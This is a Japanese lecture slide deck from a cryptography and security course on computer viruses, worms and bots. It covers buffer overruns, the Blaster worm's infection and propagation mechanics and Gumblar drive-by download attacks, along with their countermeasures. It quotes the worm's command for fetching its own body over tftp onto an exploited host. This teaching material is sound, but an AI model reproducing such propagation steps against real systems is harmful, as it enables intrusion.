本日の資料(「ウィルスの特徴について」)

攻撃パターン(その1)
ウィルス(ウイルス)の特徴について
「暗号とセキュリティ」(第9回目)
今井慈郎([email protected])
「コンピュータウィルス(ウイルス)」という
言葉を知っていますか?
• 増殖の仕組みを保持(「Virus(ヴィルス)」という名
前の由来).
• 自己増殖(コンピュータ内のファイルに自動的に感
染.
• ネットワークに接続している他のコンピュータのファ
イルに自動的に感染等).
• コンピュータに登録されている電子メイルのアドレス
帳や送受信の履歴を利用し,自動的にウィルス付
きの電子メイルを送信するなど,世界中にウィルス
が蔓延する大きな原因.
被害者が・・
今度は加害者
になる点が恐ろ
しい!
出典
http://www.soumu.go.jp/main_sosiki/joho_tsusin/security/kiso/k04_virus.htm
改めて,ウィルス(virus)とは?
• 名称の由来:このソフト(ウィルス)が含まれ
たファイルは,「感染」していると言い,感染
したファイルを複製(コピー)することにより
広がって行く様が,生物であるウィルスの
増殖に類似.
• コンピュータウィルスの感染阻止:感染した
ウィルスを検出・駆除する技術をアンチウィ
ルス(anti-virus).それらを支援するソフトウェ
アをアンチウィルスソフトウェア,ウィルス
対策ソフト,ワクチン.
改めて,ウィルス(virus)とは??
• 狭義のウィルスの定義:自身は独立して実
行可能なプログラムではなくプログラム断
片,他のファイルに感染し,その機能を発
揮.
• 他に「ワームウィルス」「トロイの木馬(スパ
イウェア)」「ボット」など(種類も増殖中)
次回紹介
その分類・・ワーム
• ワーム(warm):自身が独立して実行可能なプログラ
ム.
• システムから別のシステムに感染する時,宿主となる
ファイルは不要.
• ネットワークを介し,攻撃先のシステムのセキュリティ
ホールを悪用して侵入.
• 侵入したシステムに感染・定住する場合,システム内
に宿主となるファイル類が必要な時,「ワームウィルス」
と呼ばれ,この場合,狭義のアンチウィルスソフトウェ
ア(ファイル感染検索)で対策可能.
その分類・・ボット
• ボット(BOT):コンピュータを外部から遠隔操作するた
めのコンピュータウィルス(ワーム)の一種.
• インターネットを通じ,悪意のあるハッカー(クラッカ)が,
常駐しているボットを通じて感染したコンピュータを遠
隔操作.
• 外部から自由に操るという動作から,常駐型の遠隔
操作ソフトウェアのことをロボット(Robot)をもじったボッ
ト(BOT)の呼称.
セキュリティホール(Security hole)
• OSやソフトウェアにおいて,プログラム不具合・設計ミスが原
因となって発生する情報セキュリティ上の欠陥(抜け穴).
• セキュリティホールが残された状態でシステムを利用し続ける
と,侵入や破壊工作への利用,ウィルス感染などの危険性.
• 代表的なセキュリティホールとして,「バッファオーバーフロー」
(Buffer overlow:OSやアプリケーションソフトのプログラムが処
理に利用しているメモリのバッファ領域に入り切らない大量の
データが書き込まれると(その対策が不十分だと),予期せぬ
動作の実行・システム停止などの不具合あり.
• バッファオーバーフロー自体は,内部で利用するバッファの適
切な管理で解決可能(しかし,一部でも対策を怠った場合,重
大なセキュリティホールに危険性)
コンピュータウィルスの代表例:MS-Blaster
について紹介(その行動パターンを理解)
• Blasterワーム感染現象
•
•
•
•
感染拡大の理由
Blasterワームの攻撃対象
Blasterワームの攻撃手法
Blasterワームの攻撃パターン
残念ながら大流行した背景にはセキュリティの脆弱性が存在
Blasterワーム感染現象
• Windowsのセキュリティ・ホール(MS03-026:
RPCインターフェイスのバッファ・オーバーラ
ンによりコードが実行)を攻撃する「Blaster」と
呼ばれるワームが全世界で急速感染(2003
年).
• 国内でも企業や自治体などがBlasterワーム
に感染.業務停止などの影響が発生.
• 1つの社会現象(セキュリティホール,コンピュー
タウィルスなどの存在を一般が認知).
バッファオーバーラン
• Buffer overrun とは,プログラムのバグによって起こるコンピュー
タの望ましくない動作の1つ.バッファオーバーフローと同義
• バッファオーバーランはコンピュータセキュリティ上の深刻なセ
キュリティホールと見なされ,バッファオーバーランが起こる可
能性のあるプログラムはすぐに修正する必要あり.
• このようなバグのあるプログラムに対し,意図的なデータ(悪意
のあるコード)を与えることにより,コンピュータの動作を乗取っ
てしまうことが可能(問題点)
• バッファオーバーランは上書きする領域の種類により,スタック
オーバーラン・ヒープオーバーランに大別
• スタックやヒープには,例えばサブルーチンのリターンアドレス
やヒープ内のコードを格納できるため,そのようなデータを外部
から上書きし,意図的なコードを実行させることが可能
感染拡大の理由No1
• Blasterワームは,TCPの135番ポートやUDPの69
番ポートなどを介して感染を拡大.
• 感染の懸念は,ファイアウォールなどを正しく設
置せず(当該ポート等を正しくフィルタリングせず),
インターネットに接続している個人ユーザのコン
ピュータで,MS03-026のセキュリティ・ホールが
放置されている状況.
• 一方,企業のコンピュータは,通常,企業のイン
ターネット接続では,ファイアウォールによって外
部から社内LANへの当該ポートのアクセスは遮
断されている場合多い.
感染拡大の理由No2
• ファイアウォールのフィルタリングが完全であれば,
社内にMS03-026のセキュリティ・ホールが放置さ
れたコンピュータがあっても,感染防止は可能.
• しかし実際には,国内でも一部の企業や自治体な
どがBlasterワームに感染,業務に支障(感染経路
は明らかになっていない場合が多い).
• 現在のコンピュータ・ネットワークでは,ダイヤルアッ
プ接続(RAS:Remote Access Service)やVPN
(Virtual Private Network )接続で社内LANに接続
するモバイル・ユーザがいたり,ノートPCを持ち込
んでLANに接続するユーザがいたりと,ネットワー
ク利用の幅が拡大.
感染拡大の理由No3
• ファイアウォールを設置・管理するだけでは,ワー
ムなどの攻撃に対し,社内(組織内)ネットワーク
防御が困難.
• 基本的には,使用する総てのコンピュータを対象
に,公開修正プログラムの適切な設定・更新の
実施が最も有効な予防策.
マイクロソフトが膨大な費用を掛けて修正プログラム
の配布(そのための多数のサーバを設置)を行った
のは有名
Blasterワームの攻撃対象
Blasterワームの攻撃によっ
て影響を受けるWindows
のバージョンは右の通り
企業で利用中の少し古い
ほとんど総てのサーバ/
クライアントPCが対象.
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
Windows NT Workstation 4.0
Windows NT Server 4.0
Windows NT Server, Enterprise Edition 4.0
Windows NT Server 4.0, Terminal Server Edition
Windows 2000 Professional
Windows 2000 Server
Windows 2000 Advanced Server
Windows 2000 Datacenter Edition
Windows 2000 Powered
Windows XP Home Edition
Windows XP Professional
現役
Windows XP Tablet PC Edition
Windows Server 2003 Standard Edition
Windows Server 2003 Enterprise Edition
Windows Server 2003 Datacenter Edition
Windows Server 2003 Web Edition
Blasterワームの攻撃手法No1
1. Blasterワームは,Windows OSに感染すると,
「BILLY」というミューテックス(スレッドの同期を
制御するために使用されるWin32のカーネル・
オブジェクト)を作成.自分自身が2度以上起動
(感染)しないように保護.続いてレジストリに以
下のキーを登録.
キー:
HKEY_LOCAL_MACHINE¥Software¥Micros
oft¥Windows¥CurrentVersion¥Run
値 :"windows auto update" = "MSBLAST.EXE"
Windowsの起動時にmsblast.exe(ワームの実
行ファイル)が自動的に実行されるよう設定.
Blasterワームの攻撃手法No2
2. 他のコンピュータに自身を提供するための
tftpサーバ機能を実行.tftpとは,UDPの69番
でリッスンする簡易ファイル転送プロトコル.
この後,Blasterワームは,別のコンピュータ
に自身のコピーを送り込み感染拡大活動を
開始.
Blasterワームの攻撃手法No3
3. 攻撃対象(のIPアドレス)を以下のようにして決定.
(1).乱数発生し,それを20で除算.剰余が12以上
の場合,攻撃のターゲットをローカルIPアドレス
をベースと設定.ローカル・ホスト(感染した元の
コンピュータ)のIPアドレスをA.B.C.Dとすると、ま
ずDを0に設定,さらにCが20よりも大きければ,
20以下の乱数をCから減算.
(2).剰余が12未満の場合,攻撃対象のコンピュー
タ(のIPアドレス)をランダムに生成.
Blasterワームの攻撃手法No4
4. Blasterワームは,60%の確率でローカルの
LAN(同一サブネット上のコンピュータ)を攻撃し,
40%の確率でグローバル・アドレスを含む外部
ネットワークを攻撃.一度IPアドレスを決定すれ
ば,以後は1つずつ増加させながら以下の攻撃
の繰返し.
(1).攻撃対象IPアドレスの決定後,TCPの135番
ポートに攻撃用のデータを送信.
(2).MS03-026のセキュリティ・ホールが修正さ
れていないコンピュータを探索.
Blasterワームの攻撃手法No5
(3).未修正コンピュータの発見後,MS-RPCのバッ
ファ・オーバーフローの脆弱性を使って,TCPの
4444番ポートで待機するリモート・シェルを作成.
(4).感染元のコンピュータから「msblast.exe」本体
を取得するコマンド(“tftp <ホスト名> get
msblast.exe”)をリモート・シェルに送り込み,実
行を指示.
Blasterワームの攻撃手法No6
(5).Blasterワーム本体が攻撃先のコンピュータ
にtftpプロトコルで転送.
(6).「Blasterワーム本体」(msblast.exe)を起動さ
せるコマンドを送り込み,Blasterワームが実行を
開始.(これにより,さらに感染を拡大させる)
Blasterワームの攻撃パターン
•
最初の攻撃(TCP 135番ポートへの攻撃用
データの送信)を受けた時,感染せず,シス
テムを再起動するコンピュータも存在.その
場合,感染自体には加担せず,推移.しか
し,セキュリティ・ホールを解消しない限り,
攻撃用データを受信するたびにシステムが
再起動を繰返す現象(を発症).
Blasterワームの攻撃パターン2
•
Blasterワームには,システムカレンダが8月
16日以降の場合,マイクロソフトのWindows
Updateサイト(windowsupdate.com)へのDoS
攻撃(サービス妨害攻撃)を仕掛けるコード
が埋め込まれおり,ワームが攻撃するセキュ
リティ・ホールの修正プログラムを適用させ
ないようにする措置と憶測.
バッファオーバーランによる攻撃
• 典型的バッファオーバーラン:バッファがスタック領域
に割り当てられたものである場合(C言語の自動変
数ではバッファがスタック領域に割当てられる),は
み出したデータがスタック領域の当該バッファ割当て
部分よりも外の部分を書き換える.一方,スタック領
域にはサブルーチンからのリターンアドレス等が格
納されているため,そのリターンアドレスをバッファー
オーバーランしたデータで書き換えられてしまう
(Return-to-libc攻撃).
• 一般に市販OSの多くは,メモリ保護機能を持たない
ため,Return-to-libc攻撃に弱い点が問題の根底.
バッファオーバーランによる攻撃2
• クラッカは,Return-to-libc攻撃で,データ改竄・システ
ム損壊を目的とした操作を行う(通常,ワームウィル
ス等の不正プログラムを作成し,それにReturn-to-libc
攻撃を実行させる).
• 具体的には,バッファオーバーラン攻撃を行う場合,
①送信データに不正なプログラムのコード(シェルコー
ド)を挿入,②前述のスタック領域上のリターンアドレ
ス等を,この不正コードが存在するアドレスに書換,
③任意の不正なコードを相手のコンピュータにおいて
実行,④OS上の管理者権限を不正に奪取,
などの攻撃を実行する.・・ 代表的な攻撃手法
ガンブラ(Gumblar)
• ガンブラ:2009年末から2010年初頭にかけて被害拡大,
マルウェアをダウンロードさせようとする攻撃手法,ある
いは攻撃による脅威(マルウェアを含む)を意味.
• ガンブラは主にAdobe ReaderやFlash Playerなどの脆弱
性を突き,企業Webサイト等へ不正にJavaScriptのコード
を挿入,正規のWebサイトを改竄(ざん).改竄されたWeb
ページを閲覧すると,気づかないうちに不正なWebサイト
へと誘導.ここで別の様々なマルウェアやウィルスに感染
する危険あり.不正サイトへの誘導は閲覧者に気づかれ
ずに(ドライブバイダウンロードなる手法で)実行され,知
らない間に感染被害に遭う可能性.
ガンブラ(Gumblar)2
• ガンブラは,2009年の前半に「GENOウィルス」として流
行.その後,2009年10月以降に再度勢力を急増.大手企
業のウェブサイト(JR東日本・ホンダ・ローソン・京王グルー
プ・ハウス食品など多数)もWebサイト改竄被害に遭遇と
報告.
• ガンブラによる被害を防ぐには,脆弱性が利用させる
Adobe Acrobat、Adobe Reader、Flash Player、Java(JRE)
などを最新バージョンに更新,Microsoft Updateの実施,
アンチウィルスソフトのパターンファイル更新などが必要.
ガンブラの攻撃パターン
• ドライブバイダウンロード:Webブラウザを通じ,ユーザに気
づかせないようソフトウェア部品をダウンロードさせる手法.
• スパイウェア・マルウェア・ウィルスなどが侵入・攻撃を行う
の経路として利用.
• ユーザがWebサイトを閲覧しただけで自動的にスパイウェア
やマルウェアがダウンロードされてしまう.
• あるいは,ダウンロードが実行されてもユーザーは気づかな
いというに特徴あり.企業のWebサイトが改竄(ドライブバイ
ダウンロードが埋め込まる)
ガンブラの攻撃パターン2
パソコンの設定ファイル(レジストリ)を書き換え
ネットワークに流れるデータを監視
監視により発見したFTPのID・パスワードを収集
(感染に気づかないままでいると)常にFTPのID・パスワード
が犯人側に送信.
• (改竄被害を何度も受けている企業の場合)ウィルスが残っ
たままでいる可能性大.ID・パスワードを変更し,Webサイト
を修正しても,残留ウィルスにより,再度書き換えられるた
め,被害が再燃.
•
•
•
•
ガンブラの攻撃パターン3
ウィルス感染に気づかない理由:
• ウィルス対策ソフトのパターンファイルが,ガンブラ
亜種を検知できない.
• ウィルス対策ソフト側の発言によると「亜種が登場
するスピードが速すぎ,パターンファイル方式での
検知・駆除が困難」
• ウィルスを発見するには,パターンファイル方式だ
けでは無理と考えるべき
ガンブラ攻撃への対策
• ドライブバイダウンロード攻撃では,WebブラウザやOSの脆
弱性を突くように実行.従って,ドライブバイダウンロードに
よる攻撃を回避するため,ウィルス対策ソフトやファイアウォー
ルの導入などが必要.
• WebブラウザやOSのセキュリティパッチを更新し,常に最新
の状態に保全
• 感染を防ぐには,ウィルス対策のパターンファイルだけでは
なくURLフィルタリング機能が必要.これは,不正なスクリプ
トがある外部サイト・ウィルスが混在する外部サイトへのアク
セスを遮断する機能.
• URLフィルタリング機能より,仮にガンブラ感染後でも,ID・
パスワードは流出は抑制,ウイルス増殖の可能性を低減.
ガンブラ(Gumblar)
http://www.ipa.go.jp/security/txt/2010/02outline.html
http://itpro.nikkeibp.co.jp/article/COLUMN/20090727/334548/
http://www.yomiuri.co.jp/net/security/goshinjyutsu/20100108-OYT8T00898.htm
http://www.yomiuri.co.jp/net/security/goshinjyutsu/20100108-OYT8T00898.htm